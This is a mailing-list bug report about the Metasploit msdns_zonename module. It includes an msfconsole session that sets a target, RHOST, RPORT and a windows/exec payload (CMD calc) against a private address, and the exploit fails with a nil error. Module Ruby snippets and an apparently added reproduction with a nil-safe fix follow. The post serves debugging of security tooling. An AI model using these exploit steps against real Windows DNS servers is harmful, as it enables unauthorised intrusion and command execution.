Metasploit mailing list archives
BUG: in windows/dcerpc/msdns_zonename (NilClass)
From: kristian.hermansen at gmail.com (Kristian Hermansen)
Date: Mon, 25 Jun 2007 21:46:03 -0400
I tried hacking around and fixing this one today, but it looks like it is a Ruby bug that never got worked around in MSF 3.0 for some reason? Trace below...

administrator at khermans-um64:~/exploits/trunk$ svn up
At revision 5000.
administrator at khermans-um64:~/exploits/trunk$ ./msfconsole

[msfconsole ASCII-art banner]

       =[ msf v3.1-dev
+ -- --=[ 200 exploits - 106 payloads
+ -- --=[ 17 encoders - 5 nops
       =[ 38 aux

msf > use windows/dcerpc/msdns_zonename
msf exploit(msdns_zonename) > show options

Module options:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   Locale  English          yes       Locale for automatic target (English, French, Italian, ...)
   RHOST                    yes       The target address
   RPORT   0                yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

msf exploit(msdns_zonename) > set RHOST 172.31.4.14
RHOST => 172.31.4.14
msf exploit(msdns_zonename) > set RPORT 53
RPORT => 53
msf exploit(msdns_zonename) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)
   1   Windows 2000 Server SP0-SP4+ English
   2   Windows 2000 Server SP0-SP4+ Italian
   3   Windows 2000 Server SP0-SP4+ French
   4   Windows 2003 Server SP0 English
   5   Windows 2003 Server SP0 French
   6   Windows 2003 Server SP1-SP2 English
   7   Windows 2003 Server SP1-SP2 French
   8   Windows 2003 Server SP1-SP2 Italian
   9   Windows 2003 Server SP1-SP2 German

msf exploit(msdns_zonename) > set TARGET 6
TARGET => 6
msf exploit(msdns_zonename) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(msdns_zonename) > show options

Module options:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   Locale  English          yes       Locale for automatic target (English, French, Italian, ...)
   RHOST   172.31.4.14      yes       The target address
   RPORT   53               yes       The target port

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  thread           yes       Exit technique: seh, thread, process

Exploit target:

   Id  Name
   --  ----
   6   Windows 2003 Server SP1-SP2 English

msf exploit(msdns_zonename) > set CMD calc
CMD => calc
msf exploit(msdns_zonename) > exploit
[-] Exploit failed: undefined method `name' for nil:NilClass
msf exploit(msdns_zonename) > show options

Module options:

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   Locale  English          yes       Locale for automatic target (English, French, Italian, ...)
   RHOST   172.31.4.14      yes       The target address
   RPORT   53               yes       The target port

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc             yes       The command string to execute
   EXITFUNC  thread           yes       Exit technique: seh, thread, process

Exploit target:

   Id  Name
   --  ----
   6   Windows 2003 Server SP1-SP2 English

Relevant lines are 93 and 110. For some reason, targets does not get set properly and remains nil. Then, when referencing the 'name' attribute, we raise an exception from ruby...

<snip>
def gettarget(os)
  # Walk the module's target table; first entry whose OS tag and
  # name (locale) both match wins
  targets.each do |target|
    if ((target['OS'] =~ /#{os}/) && (target.name =~ /#{datastore['Locale']}/))
      return target
    end
  end
  # No match: caller receives nil
  return nil
end
</snip>

<snip>
def exploit
  # Ask the endpoint mapper to locate the port for us
  dport = datastore['RPORT'].to_i
  # target.name is dereferenced here without a nil check
  if ((dport != 0) && (target.name =~ /Automatic/))
    print_status("Could not use automatic target when the remote port is given");
    return
  end
</snip>

I found this from hdm a while back...

http://www.meatsploit.com/archive/framework/msg02280.html

Any ideas? I would patch it, but I'm not really a Ruby dude at the moment. Heh, OK, I'll jump on the Ruby wagon soon I suppose. FWIW, if I place a return call before references to name, the exploit returns cleanly. I don't know the MSF3 base well enough to know the coding practices and/or the effect it would have for my simple hack to set target correctly when not using automatic target selection...

-- 
Kristian Hermansen
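To illustrate the failure mode in the report (a lookup that falls through to nil, followed by an unguarded `target.name` dereference) without the framework, here is a small stand-alone Ruby example. It is an added illustration, not code from the Metasploit module or from the poster; the `Target` struct, the constructed target table and the `guarded_target_name` helper are all assumptions made for the example, mirroring only the shape of the snippet above (`target['OS']` plus `target.name`).

```ruby
# Added example, not Metasploit code: reproduces the nil-target path from
# the report and shows a guarded caller that fails with a clear message
# instead of a NoMethodError on nil.

# Minimal stand-in for the module's target objects: responds to .name and
# to ['OS'] the way the reported gettarget expects.
Target = Struct.new(:name, :opts) do
  def [](key)
    opts[key]
  end
end

# Constructed target table (values chosen for the example only).
TARGETS = [
  Target.new('Windows 2000 Server SP0-SP4+ English', { 'OS' => 'Windows 2000' }),
  Target.new('Windows 2003 Server SP1-SP2 English',  { 'OS' => 'Windows 2003 SP1' }),
  Target.new('Windows 2003 Server SP1-SP2 French',   { 'OS' => 'Windows 2003 SP1' }),
]

# Same control flow as the reported gettarget: first entry whose OS tag and
# name both match is returned; no match falls through to nil.
# Regexp.escape is used so a locale like "C++" cannot break the pattern.
def gettarget(targets, os, locale)
  targets.each do |target|
    if (target['OS'] =~ /#{Regexp.escape(os)}/) && (target.name =~ /#{Regexp.escape(locale)}/)
      return target
    end
  end
  nil
end

# The unguarded shape from the report: dereferences the lookup result
# directly, so an unmatched OS/locale raises NoMethodError on nil.
def unguarded_target_name(targets, os, locale)
  gettarget(targets, os, locale).name
end

# Guarded version: check for nil once, at the boundary, and return a
# diagnostic string the caller can print instead of crashing.
def guarded_target_name(targets, os, locale)
  target = gettarget(targets, os, locale)
  return "no target matches OS=#{os.inspect} locale=#{locale.inspect}" if target.nil?
  target.name
end

if __FILE__ == $0
  puts guarded_target_name(TARGETS, 'Windows 2003 SP1', 'English')
  puts guarded_target_name(TARGETS, 'Windows 2003 SP1', 'German')
end
```

Running the file prints the matched name for an English 2003 SP1 lookup and the diagnostic string for German, which has no entry in the constructed table; the unguarded variant raises `NoMethodError` on that second input, which is the `undefined method 'name' for nil:NilClass` seen in the console trace.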
Current thread:
- BUG: in windows/dcerpc/msdns_zonename (NilClass) Kristian Hermansen (Jun 25)
- BUG: in windows/dcerpc/msdns_zonename (NilClass) M.P.Sairam (Jun 25)